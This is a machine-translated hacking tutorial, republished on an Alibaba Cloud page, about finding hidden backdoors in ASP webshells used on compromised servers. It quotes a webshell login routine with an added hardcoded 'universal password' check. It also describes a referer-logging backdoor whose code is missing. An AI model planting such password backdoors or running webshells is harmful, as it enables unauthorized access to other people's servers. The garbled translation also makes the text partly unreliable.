Use simple asp Trojan backdoor to find asp Trojan Backdoor

Source: Internet
Author: User

I can't write asp horse for me. I can only write it with prawns, but I don't know how many hosts are circulating on the Internet. It is inevitable that some bad people will add backdoors in it.

It's hard to get a shell and it's stolen. How can this problem be solved! Therefore, after the asp Trojan is installed, check whether there are any backdoors. Generally, the backdoors are encrypted for privacy! First, we need to decrypt the asp Trojan decryption tool and then check whether there is a universal password. That is to say, even if you change the trojan password, he can use this password to log on.

Normal:
EnD fUNCtION
IF SEssIoN ("web2a2dmin") <> UsERpaSs thEn
IF requeSt. FoRM ("pass") <> "TheN
IF REquesT. foRM ("pass") = uSERPASS Then
SEsSIoN ("web2a2dmin") = uSERPAss
RESPOnsE. rEdirEct Url
ELse
Rrs "sorry, password verification failed! "

With a universal password:
EnD fUNCtION
IF SEssIoN ("web2a2dmin") <> UsERpaSs thEn
IF requeSt. FoRM ("pass") <> "TheN
IF REquesT. foRM ("pass") = uSERPASS or request. form ("pass") = "1111111" Then
SEsSIoN ("web2a2dmin") = uSERPAss
RESPOnsE. rEdirEct Url
ELse
Rrs "sorry, password verification failed! "

1111111 is the legendary universal password.

Find the universal password and delete or request. form ("pass") = "1111111!

Most of the following Trojans use frame Trojans:

Delete it after finding it. The asp backdoor will be removed here!


The following describes the principles of backdoors:

This is a piece of received asp code to save it as 1.asp

The following is a reference clip:
 

The Code basically means: "HTTP_REFERER" link to the URL of the previous page of the current page
Simply put, the webshelladdress is recorded in bobo.txt.

Upload to a space such as http: // 127.0.0.1/1.asp

The following is a reference clip:
 

When it is inserted into the asptrojan, someone else Else, the asptrojan will generate a bobo.txt, and there will be an asp Trojan path.

We learned from him for a better understanding. You should never use it for the whole cainiao!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.